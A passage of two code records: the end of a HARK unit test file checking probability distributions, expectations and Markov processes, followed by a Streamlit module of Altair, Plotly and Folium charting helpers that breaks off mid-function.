IncShkDstn,\n lambda atoms, a, r: r / atoms[0] * a + atoms[1],\n np.array([0, 1, 2, 3, 4, 5]), # an aNrmNow grid?\n 1.05, # an interest rate?\n )\n\n self.assertAlmostEqual(ce9[3], 9.51802, places=HARK_PRECISION)\n\n def test_self_expected_value(self):\n dd_0_1_20 = Normal().discretize(20, method=\"hermite\")\n dd_1_1_40 = Normal(mu=1).discretize(40, method=\"hermite\")\n dd_10_10_100 = Normal(mu=10, sigma=10).discretize(100, method=\"hermite\")\n\n ce1 = expected(dist=dd_0_1_20)\n ce2 = expected(dist=dd_1_1_40)\n ce3 = expected(dist=dd_10_10_100)\n\n self.assertAlmostEqual(ce1[0], 0.0)\n self.assertAlmostEqual(ce2[0], 1.0)\n self.assertAlmostEqual(ce3[0], 10.0)\n\n ce4 = expected(lambda x: 2**x, dd_0_1_20)\n\n self.assertAlmostEqual(ce4[0], 1.27154, places=HARK_PRECISION)\n\n ce5 = expected(func=lambda x: 2 * x, dist=dd_1_1_40)\n\n self.assertAlmostEqual(ce5[0], 2.0)\n\n ce6 = expected(lambda x, y: 2 * x + y, dd_10_10_100, args=(20))\n\n self.assertAlmostEqual(ce6[0], 40.0)\n\n ce7 = expected(\n func=lambda x, y: x + y,\n dist=dd_0_1_20,\n args=(np.hstack([0, 1, 2, 3, 4, 5])),\n )\n\n self.assertAlmostEqual(ce7.flat[3], 3.0)\n\n PermShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n TranShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n IncShkDstn = combine_indep_dstns(PermShkDstn, TranShkDstn)\n\n ce8 = expected(lambda atoms: atoms[0] + atoms[1], dist=IncShkDstn)\n\n self.assertAlmostEqual(ce8, 2.0)\n\n ce9 = expected(\n func=lambda atoms, a, r: r / atoms[0] * a + atoms[1],\n dist=IncShkDstn,\n args=(\n np.array([0, 1, 2, 3, 4, 5]), # an aNrmNow grid?\n 1.05, # an interest rate?\n ),\n )\n\n self.assertAlmostEqual(ce9[3], 9.51802, places=HARK_PRECISION)\n\n def test_self_dist_of_func(self):\n # Function 1 -> 1\n # Approximate the lognormal expectation\n sig = 0.05\n norm = Normal(mu=-(sig**2) / 2, sigma=sig).discretize(131, method=\"hermite\")\n my_logn = norm.dist_of_func(lambda x: np.exp(x))\n exp = my_logn.expected()\n self.assertAlmostEqual(exp, 1.0)\n\n # Function 1 -> n\n # Mean and variance of the normal\n norm = Normal(mu=0.0, sigma=1.0).discretize(5, method=\"hermite\")\n moments = norm.dist_of_func(lambda x: np.array([x, x**2]))\n exp = moments.expected().flatten()\n self.assertAlmostEqual(exp[0], 0.0)\n self.assertAlmostEqual(exp[1], 1.0)\n\n # Function n -> 1\n # Expectation of the sum of two independent normals\n mu_a, mu_b = 1.0, 2.0\n si_a, si_b = 3.0, 4.0\n norm_a = Normal(mu=mu_a, sigma=si_a).discretize(5, method=\"hermite\")\n norm_b = Normal(mu=mu_b, sigma=si_b).discretize(5, method=\"hermite\")\n binorm = combine_indep_dstns(norm_a, norm_b)\n mysum = binorm.dist_of_func(func=lambda x: np.sum(x, axis=0))\n exp = mysum.expected()\n self.assertAlmostEqual(exp[0], mu_a + mu_b)\n\n # Function n -> m\n # Mean and variance of two normals\n moments = binorm.dist_of_func(\n func=lambda x: np.array(\n [x[0], (x[0] - mu_a) ** 2, x[1], (x[1] - mu_b) ** 2]\n ),\n )\n exp = moments.expected()\n self.assertAlmostEqual(exp[0], mu_a)\n self.assertAlmostEqual(exp[1], si_a**2)\n self.assertAlmostEqual(exp[2], mu_b)\n self.assertAlmostEqual(exp[3], si_b**2)\n\n\nclass MatrixDiscreteDistributionTests(unittest.TestCase):\n \"\"\"\n Tests matrix-valued discrete distribution.\n \"\"\"\n\n def setUp(self):\n self.draw_1 = np.array(\n [\n [[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],\n [[7.0, 8.0, 9.0], [10.0, 11.0, 12.0]],\n ]\n )\n\n self.draw_2 = -1 * self.draw_1\n\n atoms = np.stack([self.draw_1, self.draw_2], axis=-1)\n pmv = np.array([0.5, 0.5])\n\n self.mat_distr = DiscreteDistribution(pmv, atoms, seed=0)\n\n def test_draw(self):\n \"\"\"\n Check that the draws are the matrices we\n want them to be\n \"\"\"\n\n draw = self.mat_distr.draw(1)\n self.assertTrue(np.allclose(draw[..., 0], self.draw_2))\n\n def test_expected(self):\n # Expectation without transformation\n exp = calc_expectation(self.mat_distr)\n\n # Check the expectation is of the shape we want\n self.assertTrue(exp.shape[0] == self.draw_1.shape[0])\n self.assertTrue(exp.shape[1] == self.draw_1.shape[1])\n\n # Check that its value is what we expect\n self.assertTrue(np.allclose(exp, 0.0))\n\n # Expectation of the sum\n exp = calc_expectation(self.mat_distr, func=np.sum)\n self.assertTrue(float(exp) == 0.0)\n\n def test_distr_of_fun(self):\n # A function that receives a (2,n,m) matrix\n # and sums across n, getting a (2,1,m) matrix\n def myfunc(mat):\n return np.sum(mat, axis=1, keepdims=True)\n\n mydistr = distr_of_function(self.mat_distr, myfunc)\n\n # Check the dimensions\n self.assertTrue(mydistr.dim() == (2, 1, 3))\n\n\nclass DistributionClassTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_drawMeanOneLognormal(self):\n MeanOneLogNormal().draw(1)[0]\n\n def test_Lognormal(self):\n dist = Lognormal()\n\n dist.draw(1)[0]\n\n dist.draw(100)\n dist.reset()\n\n dist.draw(1)[0]\n\n def test_Normal(self):\n dist = Normal()\n\n dist.draw(1)[0]\n\n dist.draw(100)\n dist.reset()\n\n dist.draw(1)[0]\n\n def test_MVNormal(self):\n # Are these tests generator/backend specific?\n dist = MVNormal()\n\n # self.assertTrue(\n # np.allclose(dist.draw(1)[0], np.array([2.76405, 1.40016]))\n # )\n\n dist.draw(100)\n dist.reset()\n\n # self.assertTrue(\n # np.allclose(dist.draw(1)[0], np.array([2.76405, 1.40016]))\n # )\n\n def test_Weibull(self):\n Weibull().draw(1)[0]\n\n def test_Uniform(self):\n uni = Uniform()\n\n Uniform().draw(1)[0]\n\n self.assertEqual(\n calc_expectation(uni.discretize(10, method=\"equiprobable\")), 0.5\n )\n\n uni_discrete = uni.discretize(10, method=\"equiprobable\", endpoints=True)\n\n self.assertEqual(uni_discrete.atoms[0][0], 0.0)\n self.assertEqual(uni_discrete.atoms[0][-1], 1.0)\n self.assertEqual(\n calc_expectation(uni.discretize(10, method=\"equiprobable\")), 0.5\n )\n\n def test_Bernoulli(self):\n Bernoulli().draw(1)[0]\n\n\nclass IndexDistributionClassTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_IndexDistribution(self):\n cd = IndexDistribution(Bernoulli, {\"p\": [0.01, 0.5, 0.99]})\n\n conditions = np.array([0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2])\n\n draws = cd.draw(conditions)\n\n self.assertEqual(draws[:4].sum(), 0)\n self.assertEqual(draws[-4:].sum(), 4)\n self.assertEqual(cd[2].p.tolist(), 0.99)\n\n def test_IndexDistribution_approx(self):\n cd = IndexDistribution(\n Lognormal, {\"mu\": [0.01, 0.5, 0.99], \"sigma\": [0.05, 0.05, 0.05]}\n )\n\n approx = cd.discretize(10)\n\n draw = approx[2].draw(5)\n\n self.assertAlmostEqual(draw[1], 2.70826, places=HARK_PRECISION)\n\n def test_IndexDistribution_seeds(self):\n cd = IndexDistribution(Lognormal, {\"mu\": [1, 1], \"sigma\": [1, 1]})\n\n draw_0 = cd[0].draw(1).tolist()\n draw_1 = cd[1].draw(1).tolist()\n\n self.assertNotEqual(draw_0, draw_1)\n\n\nclass MarkovProcessTests(unittest.TestCase):\n \"\"\"\n Tests for MarkovProcess class.\n \"\"\"\n\n def test_draw(self):\n mrkv_array = np.array([[0.75, 0.25], [0.1, 0.9]])\n\n mp = MarkovProcess(mrkv_array)\n\n new_state = mp.draw(np.zeros(100).astype(int))\n\n self.assertEqual(new_state.sum(), 31)\n\n new_state = mp.draw(new_state)\n\n self.assertEqual(new_state.sum(), 45)\n\n\nclass LogNormalToNormalTests(unittest.TestCase):\n \"\"\"\n Tests methods to convert between lognormal and normal parameters.\n \"\"\"\n\n def test_lognorm_to_norm(self):\n avg_ln, std_ln = 1.0, 0.2\n avg_n, std_n = calc_normal_style_pars_from_lognormal_pars(avg_ln, std_ln)\n avg_hat, std_hat = calc_lognormal_style_pars_from_normal_pars(avg_n, std_n)\n\n self.assertAlmostEqual(avg_ln, avg_hat)\n self.assertAlmostEqual(std_ln, std_hat)\n\n def test_norm_to_lognorm(self):\n avg_n, std_n = 1.0, 0.2\n avg_ln, std_ln = calc_lognormal_style_pars_from_normal_pars(avg_n, std_n)\n avg_hat, std_hat = calc_normal_style_pars_from_lognormal_pars(avg_ln, std_ln)\n\n self.assertAlmostEqual(avg_n, avg_hat)\n self.assertAlmostEqual(std_n, std_hat)\n\n\nclass NormalDistTest(unittest.TestCase):\n def test_approx_equiprobable(self):\n mu, sigma = 5.0, 27.0\n\n points = Normal(mu, sigma).discretize(701, method=\"equiprobable\").atoms\n\n self.assertAlmostEqual(np.mean(points), mu, places=7)\n self.assertAlmostEqual(np.std(points), sigma, places=2)\n\n\nclass DiscreteDistributionLabeledTests(unittest.TestCase):\n \"\"\"\n Tests for distribution.py sampling distributions\n with default seed.\n \"\"\"\n\n def test_draw(self):\n self.assertEqual(\n DiscreteDistributionLabeled(np.ones(2) / 2, np.zeros(2)).draw(1)[0],\n 0,\n )\n\n def test_self_dist_of_func(self):\n # Function 1 -> 1\n # Approximate the lognormal expectation\n sig = 0.05\n mu = -(sig**2) / 2\n norm = Normal(mu=mu, sigma=sig).discretize(131, method=\"hermite\")\n my_logn = DiscreteDistributionLabeled.from_unlabeled(\n norm.dist_of_func(func=lambda x: np.exp(x)),\n name=\"Lognormal Approximation\", # name of the distribution\n # assign limit properties\n attrs={\"limit\": {\"mu\": mu, \"sigma\": sig}},\n )\n exp = my_logn.expected()\n self.assertAlmostEqual(exp[0], 1.0)\n\n # Function 1 -> n\n # Mean and variance of the normal\n norm = Normal(mu=0.0, sigma=1.0).discretize(5, method=\"hermite\")\n moments = DiscreteDistributionLabeled.from_unlabeled(\n norm.dist_of_func(lambda x: np.vstack([x, x**2])),\n name=\"Moments of Normal Distribution\",\n var_names=[\"mean\", \"variance\"],\n attrs={\"limit\": {\"name\": \"Normal\", \"mu\": 0.0, \"sigma\": 1.0}},\n )\n exp = moments.expected().flatten()\n self.assertAlmostEqual(exp[0], 0.0)\n self.assertAlmostEqual(exp[1], 1.0)\n\n # Function n -> 1\n # Expectation of the sum of two independent normals\n mu_a, mu_b = 1.0, 2.0\n si_a, si_b = 3.0, 4.0\n norm_a = Normal(mu=mu_a, sigma=si_a).discretize(5, method=\"hermite\")\n norm_b = Normal(mu=mu_b, sigma=si_b).discretize(5, method=\"hermite\")\n binorm = combine_indep_dstns(norm_a, norm_b)\n mysum = DiscreteDistributionLabeled.from_unlabeled(\n binorm.dist_of_func(lambda x: np.sum(x, axis=0)), # vectorized sum\n name=\"Sum of two independent normals\",\n )\n exp = mysum.expected()\n self.assertAlmostEqual(exp[0], mu_a + mu_b)\n\n # Function n -> m\n # Mean and variance of two normals\n moments = DiscreteDistributionLabeled.from_unlabeled(\n binorm.dist_of_func(\n lambda x: np.array([x[0], (x[0] - mu_a) ** 2, x[1], (x[1] - mu_b) ** 2])\n ),\n name=\"Moments of two independent normals\",\n var_names=[\"mean_1\", \"variance_1\", \"mean_2\", \"variance_2\"],\n )\n exp = moments.expected()\n self.assertAlmostEqual(exp[0], mu_a)\n self.assertAlmostEqual(exp[1], si_a**2)\n self.assertAlmostEqual(exp[2], mu_b)\n self.assertAlmostEqual(exp[3], si_b**2)\n\n def test_self_expected_value(self):\n PermShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n TranShkDstn = MeanOneLogNormal().discretize(200, method=\"equiprobable\")\n IncShkDstn = combine_indep_dstns(\n PermShkDstn,\n TranShkDstn,\n )\n\n IncShkDstn = DiscreteDistributionLabeled.from_unlabeled(\n IncShkDstn,\n name=\"Distribution of shocks to Income\",\n var_names=[\"perm_shk\", \"tran_shk\"],\n )\n\n ce1 = expected(\n func=lambda dist: 1 / dist[\"perm_shk\"] + dist[\"tran_shk\"],\n dist=IncShkDstn,\n )\n\n self.assertAlmostEqual(ce1, 3.70413, places=HARK_PRECISION)\n\n ce2 = expected(\n func=lambda dist, a, r: r / dist[\"perm_shk\"] * a + dist[\"tran_shk\"],\n dist=IncShkDstn,\n args=(\n np.array([0, 1, 2, 3, 4, 5]), # an aNrmNow grid?\n 1.05, # an interest rate?\n ),\n )\n\n self.assertAlmostEqual(ce2[3], 9.51802, places=HARK_PRECISION)\n\n def test_getters_setters(self):\n # Create some dummy dsnt\n dist = DiscreteDistributionLabeled(\n pmv=np.array([0.5, 0.5]), atoms=np.array([-1.0, 1.0]), var_names=[\"my_var\"]\n )\n\n # Seed\n my_seed = 3\n dist.seed = my_seed\n self.assertTrue(my_seed == dist.seed)\n\n # RNG\n my_rng = np.random.default_rng(5)\n dist.RNG = my_rng\n self.assertTrue(my_rng == dist.RNG)\n\n def test_combine_labeled_dist(self):\n # Create some dstns\n a = DiscreteDistributionLabeled(\n pmv=np.array([0.1, 0.9]), atoms=np.array([-1.0, 1.0]), var_names=\"a\"\n )\n b = DiscreteDistributionLabeled(\n pmv=np.array([0.5, 0.5]), atoms=np.array([0.0, 1.0]), var_names=\"b\"\n )\n c = DiscreteDistributionLabeled(\n pmv=np.array([0.3, 0.7]), atoms=np.array([0.5, 1.0]), var_names=\"c\"\n )\n\n # Test some combinations\n abc = combine_indep_dstns(a, b, c)\n # Check the order\n self.assertTrue(\n np.all(\n np.isclose(\n abc.expected(),\n np.concatenate([a.expected(), b.expected(), c.expected()]),\n )\n )\n )\n # Check by label\n self.assertEqual(abc.expected(lambda x: x[\"b\"]), b.expected()[0])\n self.assertAlmostEqual(\n abc.expected(lambda x: x[\"a\"] * x[\"c\"]), a.expected()[0] * c.expected()[0]\n )\n\n # Combine labeled and non labeled distribution\n x = DiscreteDistribution(pmv=np.array([0.5, 0.5]), atoms=np.array([1.0, 2.0]))\n\n xa = combine_indep_dstns(x, a)\n self.assertFalse(isinstance(xa, DiscreteDistributionLabeled))\n self.assertTrue(\n np.all(xa.expected() == np.concatenate([x.expected(), a.expected()]))\n )\n\n # Combine multidimensional labeled\n d = DiscreteDistributionLabeled(\n pmv=np.array([0.3, 0.7]), atoms=np.array([-0.5, -1.0]), var_names=\"d\"\n )\n e = DiscreteDistributionLabeled(\n pmv=np.array([0.3, 0.7]), atoms=np.array([0.0, -1.0]), var_names=\"e\"\n )\n de = combine_indep_dstns(d, e)\n\n abcde = combine_indep_dstns(abc, de)\n self.assertTrue(\n np.allclose(\n abcde.expected(\n lambda x: np.array([x[\"d\"], x[\"e\"], x[\"a\"], x[\"b\"], x[\"c\"]])\n ),\n np.concatenate([de.expected(), abc.expected()]),\n )\n )\n\n\nclass labeled_transition_tests(unittest.TestCase):\n def setUp(self) -> None:\n return super().setUp()\n\n def test_expectation_transformation(self):\n # Create a basic labeled distribution\n base_dist = DiscreteDistributionLabeled(\n pmv=np.array([0.5, 0.5]),\n atoms=np.array([[1.0, 2.0], [3.0, 4.0]]),\n var_names=[\"a\", \"b\"],\n )\n\n # Define a transition function\n def transition(shocks, state):\n state_new = {}\n state_new[\"m\"] = state[\"m\"] * shocks[\"a\"]\n state_new[\"n\"] = state[\"n\"] * shocks[\"b\"]\n return state_new\n\n m = xr.DataArray(np.linspace(0, 10, 11), name=\"m\", dims=(\"grid\",))\n n = xr.DataArray(np.linspace(0, -10, 11), name=\"n\", dims=(\"grid\",))\n state_grid = xr.Dataset({\"m\": m, \"n\": n})\n\n # Evaluate labeled transformation\n\n # Direct expectation\n exp1 = base_dist.expected(transition, state=state_grid)\n # Expectation after transformation\n new_state_dstn = base_dist.dist_of_func(transition, state=state_grid)\n # TODO: needs a cluncky identity function with an extra argument because\n # DDL.expected() behavior is very different with and without kwargs.\n # Fix!\n exp2 = new_state_dstn.expected(lambda x, unused: x, unused=0)\n\n assert np.all(exp1[\"m\"] == exp2[\"m\"]).item()\n assert np.all(exp1[\"n\"] == exp2[\"n\"]).item()\n","repo_name":"econ-ark/HARK","sub_path":"HARK/tests/test_distribution.py","file_name":"test_distribution.py","file_ext":"py","file_size_in_byte":21139,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"35"} +{"seq_id":"71816336742","text":"import plotly.graph_objects as go\nimport plotly.express as px\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport altair as alt\nimport folium\nfrom streamlit_folium import st_folium\n\nfrom helper import round_to_nearest\n\n\ndef map_chart(df, settings):\n initial_latitude = df[settings[\"latitude\"]].iloc[0]\n initial_longitude = df[settings[\"longitude\"]].iloc[0]\n map_object = folium.Map(\n location=[initial_latitude, initial_longitude],\n zoom_start=settings[\"zoom_start\"],\n )\n\n for index, row in df.iterrows():\n latitude = row[settings[\"latitude\"]]\n longitude = row[settings[\"longitude\"]]\n folium.Marker(\n location=[latitude, longitude],\n popup=row[settings[\"popup\"]],\n tooltip=row[settings[\"tooltip\"]],\n ).add_to(map_object)\n st_data = st_folium(map_object, width=settings[\"width\"], height=settings[\"height\"])\n return st_data\n\n\ndef line_chart(df, settings):\n title = settings[\"title\"] if \"title\" in settings else \"\"\n if \"x_dt\" not in settings:\n settings[\"x_dt\"] = \"Q\"\n if \"y_dt\" not in settings:\n settings[\"y_dt\"] = \"Q\"\n if not (\"opacity\" in settings):\n settings[\"opacity\"] = 0.5\n\n if \"color\" in settings and settings[\"color\"] is not None:\n if \"hide_legend\" in settings:\n color = alt.Color(\n settings[\"color\"], legend=None, scale=alt.Scale(domain=[\"grey\"])\n )\n else:\n color = alt.Color(\n settings[\"color\"], scale=alt.Scale(scheme=\"redblue\", reverse=True)\n )\n chart = (\n alt.Chart(df)\n .mark_line(width=2, clip=True, opacity=settings[\"opacity\"])\n .encode(\n x=alt.X(\n f\"{settings['x']}:{settings['x_dt']}\",\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n ),\n y=alt.Y(\n f\"{settings['y']}:{settings['y_dt']}\",\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n ),\n color=color,\n tooltip=settings[\"tooltip\"],\n )\n )\n else:\n chart = (\n alt.Chart(df)\n .mark_line(width=2, clip=True, opacity=0.5)\n .encode(\n x=alt.X(\n f\"{settings['x']}:{settings['x_dt']}\",\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n ),\n y=alt.Y(\n f\"{settings['y']}:{settings['y_dt']}\",\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n ),\n tooltip=settings[\"tooltip\"],\n )\n )\n\n if \"compare_line\" in settings:\n df2 = df[df[\"year\"] == settings[\"compare_line\"]]\n chart += (\n alt.Chart(df2)\n .mark_line(width=2, clip=True, color=\"red\")\n .encode(\n x=alt.X(\n f\"{settings['x']}:{settings['x_dt']}\",\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n ),\n y=alt.Y(\n f\"{settings['y']}:{settings['y_dt']}\",\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n ),\n tooltip=settings[\"tooltip\"],\n )\n )\n\n if \"regression\" in settings:\n line = chart.transform_regression(settings[\"x\"], settings[\"y\"]).mark_line()\n plot = (chart + line).properties(\n width=settings[\"width\"], height=settings[\"height\"], title=title\n )\n else:\n plot = chart.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=title\n )\n st.altair_chart(plot)\n\n\ndef scatter_plot(df, settings):\n title = settings[\"title\"] if \"title\" in settings else \"\"\n chart = (\n alt.Chart(df)\n .mark_circle(\n size=60,\n )\n .encode(\n x=alt.X(settings[\"x\"], scale=alt.Scale(domain=settings[\"domain\"])),\n y=alt.Y(settings[\"y\"], scale=alt.Scale(domain=settings[\"domain\"])),\n tooltip=settings[\"tooltip\"],\n color=alt.Color(\n settings[\"color\"], sort=\"ascending\", scale=alt.Scale(scheme=\"bluered\")\n ),\n )\n .interactive()\n )\n plot = chart.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=title\n )\n st.altair_chart(plot)\n\n\ndef time_series_bar(df, settings):\n chart = (\n alt.Chart(df)\n .mark_bar(size=settings[\"size\"], clip=True)\n .encode(\n x=alt.X(\n f\"{settings['x']}:T\",\n title=settings[\"x_title\"],\n scale=alt.Scale(\n domain=settings[\"x_domain\"], axis=alt.Axis(format=(\"%b %Y\"))\n ),\n ),\n y=alt.Y(f\"{settings['y']}:Q\", title=settings[\"y_title\"]),\n tooltip=settings[\"tooltip\"],\n )\n )\n plot = chart.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=settings[\"title\"]\n )\n st.altair_chart(plot)\n\n\ndef time_series_line(df, settings):\n if \"x_domain\" in settings:\n xax = alt.X(\n f\"{settings['x']}:T\",\n title=settings[\"x_title\"],\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n )\n else:\n xax = alt.X(f\"{settings['x']}:T\", title=settings[\"x_title\"])\n\n if settings[\"y_domain\"][0] != settings[\"y_domain\"][1]:\n yax = alt.Y(\n f\"{settings['y']}:Q\",\n title=settings[\"y_title\"],\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n )\n else:\n yax = alt.Y(f\"{settings['y']}:Q\", title=settings[\"y_title\"])\n\n if \"color\" in settings:\n chart = (\n alt.Chart(df)\n .mark_line(clip=True)\n .encode(\n x=xax,\n y=yax,\n color=f\"{settings['color']}:N\",\n tooltip=settings[\"tooltip\"],\n )\n )\n else:\n chart = (\n alt.Chart(df)\n .mark_line(clip=True)\n .encode(x=xax, y=yax, tooltip=settings[\"tooltip\"])\n )\n\n if \"h_line\" in settings:\n chart += (\n alt.Chart(df)\n .mark_line(clip=True, color=\"red\")\n .encode(x=xax, y=settings[\"h_line\"], tooltip=settings[\"h_line\"])\n )\n\n if \"symbol_size\" in settings:\n if not (\"symbol_opacity\" in settings):\n settings[\"symbol_opacity\"] = 0.6\n if \"color\" in settings:\n chart += (\n alt.Chart(df)\n .mark_circle(\n size=settings[\"symbol_size\"],\n clip=True,\n opacity=settings[\"symbol_opacity\"],\n )\n .encode(\n x=xax,\n y=yax,\n color=f\"{settings['color']}:N\",\n tooltip=settings[\"tooltip\"],\n )\n )\n else:\n chart += (\n alt.Chart(df)\n .mark_circle(\n size=settings[\"symbol_size\"], opacity=settings[\"symbol_opacity\"]\n )\n .encode(x=xax, y=yax, tooltip=settings[\"tooltip\"])\n )\n plot = chart.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=settings[\"title\"]\n )\n st.altair_chart(plot)\n\n\ndef time_series_chart(df, settings):\n # line = alt.Chart(df_line).mark_line(color= 'red').encode(\n # x= 'x',\n # y= 'y'\n # )\n\n title = settings[\"title\"] if \"title\" in settings else \"\"\n if \"x_title\" not in settings:\n settings[\"x_title\"] = \"\"\n if \"symbol_size\" not in settings:\n settings[\"symbol_size\"] = 0\n if \"rolling_avg_window\" not in settings:\n settings[\"rolling_avg_window\"] = 0\n plot = (\n alt.Chart(df)\n .mark_line(point=alt.OverlayMarkDef(color=\"blue\", size=settings[\"symbol_size\"]))\n .encode(\n x=alt.X(\n f\"{settings['x']}:T\", title=settings[\"x_title\"]\n ), # , scale=alt.Scale(domain=settings['x_domain']), ),\n y=alt.Y(\n f\"{settings['y']}:Q\",\n scale=alt.Scale(domain=settings[\"y_domain\"]),\n title=settings[\"y_title\"],\n ),\n tooltip=settings[\"tooltip\"],\n )\n )\n if \"show_regression\" in settings:\n if len(df) > 2 and settings[\"show_regression\"]:\n line = plot.transform_regression(settings[\"x\"], settings[\"y\"]).mark_line(\n color=\"orange\"\n )\n plot += line\n if \"show_average\" in settings:\n if settings[\"show_average\"]:\n avg = df[settings[\"y\"]].mean()\n df_avg = pd.DataFrame(\n {\n \"x\": [df[settings[\"x\"]].min(), df[settings[\"x\"]].max()],\n \"y\": [avg, avg],\n }\n )\n line = (\n alt.Chart(df_avg)\n .mark_line(color=\"red\")\n .encode(\n x=\"x\",\n y=\"y\",\n )\n )\n plot += line\n if settings[\"rolling_avg_window\"] > 0:\n df[\"ma\"] = (\n df[settings[\"y\"]].rolling(window=settings[\"rolling_avg_window\"]).mean()\n )\n # Create the chart\n line = (\n alt.Chart(df)\n .mark_line(color=\"green\")\n .encode(x=f\"{settings['x']}:T\", y=f\"ma:Q\", strokeWidth=alt.value(3))\n )\n plot += line\n\n plot = plot.properties(\n width=settings[\"width\"], height=settings[\"height\"], title=title\n )\n st.altair_chart(plot)\n\n\ndef heatmap(df, settings):\n title = settings[\"title\"] if \"title\" in settings else \"\"\n if not (\"show_numbers\" in settings):\n settings[\"show_numbers\"] = True\n if not (\"color_scheme\" in settings):\n settings[\"color_scheme\"] = \"viridis\"\n\n plot = (\n alt.Chart(df)\n .mark_rect()\n .encode(\n # x=alt.X(settings[\"x\"], sort=list(cn.MONTHS_REV_DICT.keys())),\n x=alt.X(settings[\"x\"]),\n y=alt.Y(\n settings[\"y\"],\n sort=alt.EncodingSortField(field=\"year\", order=\"descending\"),\n ),\n color=alt.Color(\n f\"{settings['color']}:Q\",\n scale=alt.Scale(range=[\"lightblue\", \"darkred\"]),\n ),\n tooltip=settings[\"tooltip\"],\n )\n )\n\n if settings[\"show_numbers\"]:\n plot += plot.mark_text().encode(\n text=settings[\"color\"], color=alt.value(\"black\")\n )\n\n plot = plot.properties(width=settings[\"width\"], title=title)\n st.altair_chart(plot)\n\n\ndef bar_chart(df: pd.DataFrame, settings: dict):\n if \"title\" not in settings:\n settings[\"title\"] = \"\"\n if \"tooltip\" not in settings:\n settings[\"tooltip\"] = [settings[\"x\"], settings[\"y\"]]\n if \"bar_width\" not in settings:\n settings[\"bar_width\"] = 10\n if df[settings[\"x\"]].dtype == \"datetime64[ns]\":\n x_axis = alt.X(\n f\"{settings['x']}:T\",\n axis=alt.Axis(title=settings[\"x_title\"], format=settings[\"format_x\"]),\n )\n else:\n x_axis = alt.X(f\"{settings['x']}:N\")\n if \"x_domain\" in settings:\n x_axis.axis.scale = alt.Scale(domain=settings[\"x_domain\"])\n y_axis = alt.Y(settings[\"y\"], title=settings[\"y_title\"])\n if \"y_domain\" in settings:\n y_axis.axis.scale = alt.Scale(domain=settings[\"y_domain\"])\n plot = (\n alt.Chart(df)\n .mark_bar(size=settings[\"bar_width\"])\n .encode(x=x_axis, y=y_axis, tooltip=settings[\"tooltip\"])\n )\n if \"h_line\" in settings:\n plot += (\n alt.Chart(df)\n .mark_line(color=\"red\")\n .encode(\n x=x_axis,\n y=settings[\"h_line\"],\n )\n )\n\n plot = plot.properties(\n title=settings[\"title\"], width=settings[\"width\"], height=settings[\"height\"]\n )\n\n return st.altair_chart(plot)\n\n\ndef box_plot(df: pd.DataFrame, settings: dict):\n if \"title\" not in settings:\n settings[\"title\"] = \"\"\n x_axis = alt.X(f\"{settings['x']}:N\", title=settings[\"x_title\"])\n y_axis = alt.Y(settings[\"y\"], title=settings[\"y_title\"])\n plot = alt.Chart(df).mark_boxplot().encode(x=x_axis, y=y_axis)\n if \"h_line\" in settings:\n plot += (\n alt.Chart(df)\n .mark_line(color=\"red\")\n .encode(\n x=f\"{settings['x']}:N\",\n y=settings[\"h_line\"],\n )\n )\n\n plot = plot.properties(\n title=settings[\"title\"], width=settings[\"width\"], height=settings[\"height\"]\n )\n\n return st.altair_chart(plot)\n\n\ndef histogram(df: pd.DataFrame, settings: dict):\n def get_x_domain():\n x_domain = [df[settings[\"x\"]].min(), df[settings[\"x\"]].max()]\n if x_domain[0] % 2 != 0:\n x_domain[0] -= 1\n if x_domain[1] % 2 != 0:\n x_domain[1] += 1\n return x_domain\n\n if \"maxbins\" not in settings:\n rounded_num = round_to_nearest(len(df), 10)\n settings[\"maxbins\"] = rounded_num\n if \"x_domain\" not in settings:\n settings[\"x_domain\"] = get_x_domain()\n if \"title\" not in settings:\n settings[\"title\"] = \"\"\n\n plot = (\n alt.Chart(df)\n .mark_bar()\n .encode(\n x=alt.X(\n f\"{ settings['x'] }:Q\",\n bin=alt.BinParams(maxbins=settings[\"maxbins\"]),\n scale=alt.Scale(domain=settings[\"x_domain\"]),\n title=settings[\"x_title\"],\n ),\n y=alt.Y(\"count()\", axis=alt.Axis(title=settings[\"y_title\"])),\n )\n ).properties(\n title=settings[\"title\"], width=settings[\"width\"], height=settings[\"height\"]\n )\n\n return st.altair_chart(plot)\n\n\ndef line_chart_3d(df, settings):\n def value_to_xy(value, month):\n v = value - settings[\"y_domain\"][0]\n origin = (np.abs(settings[\"y_domain\"][0]) + settings[\"y_domain\"][1]) / 2\n theta_radians = 2 * np.pi / 12 * (month - 1)\n x = origin + v * np.cos(theta_radians)\n y = origin + v * np.sin(theta_radians)\n return x, y\n\n rad_max: float = np.abs(settings[\"y_domain\"][0]) + settings[\"y_domain\"][1] + 1\n df[\"x\"] = 0\n df[\"y\"] = 0\n df[\"z\"] = 0\n\n for index, row in df.iterrows():\n x, y = value_to_xy(row[settings[\"value\"]], row[settings[\"month\"]])\n z = row[settings[\"year\"]] + row[settings[\"month\"]] / 12\n df.loc[index, \"x\"] = x\n df.loc[index, \"y\"] = y\n df.loc[index, \"z\"] = z\n\n df[\"text\"] = (\n df[settings[\"year\"]].map(str)\n + \"/\"\n + df[settings[\"month\"]].map(str)\n + \": \"\n + df[settings[\"value\"]].round(1).map(str)\n + \" °C\"\n )\n\n # color schemas: https://plotly.com/python/colorscales/#colorscales-in-dash\n fig = px.scatter_3d(\n df,\n x=\"x\",\n y=\"y\",\n 